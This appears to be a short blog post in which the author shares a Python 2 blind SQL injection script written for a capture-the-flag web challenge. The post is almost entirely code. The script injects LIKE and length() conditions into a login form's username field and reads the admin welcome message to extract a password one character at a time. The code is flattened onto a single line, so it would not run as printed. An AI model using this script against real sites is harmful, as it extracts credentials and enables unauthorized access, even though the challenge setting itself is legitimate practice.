Today I would like to show you my own Blind SQL Injection script, which has been written in python.
I needed the script to one of the Web Server challenge from hidden challenge.
import urllib2 import urllib import optparse import os dict = "abecdsfghjklmnpqtuvxyzerio1234567890!@$^&*()+|}{:?><,./;'[]\=-" resp = 'Welcome back admin !' tab = [] passw = [] def bruteforcer(username,length): for x in xrange(0,int(length)): for i in xrange(0,len(dict)): os.system('clear') tab.append(dict[i]) inj = "".join(tab) injection = username + "' AND password LIKE '" + inj + "%' -- -" print inj payload = urllib.urlencode({"username": injection, "password": "someth"}) r = urllib2.urlopen('hidden_url', payload) if resp in r.read(): k = passw.append(tab[x]) break else: del tab[x] found = "".join(passw) print '[+] progress ' + found return found def len_finder(username): for i in xrange(0,99): inject = username + "' AND length(password) = " + str(i) + "-- -" payload = urllib.urlencode({"username": inject, "password": "someth"}) r = urllib2.urlopen('hidden_url', payload) if resp in r.read(): print "Password length for " + username + " is " + str(i) return i break def main(): parser = optparse.OptionParser("-u <username>") parser.add_option("-u", dest = "username", type = "string", help = "set up username") (options,args) = parser.parse_args() username = options.username length = len_finder(username) print bruteforcer(username,length) if __name__ == '__main__': main()
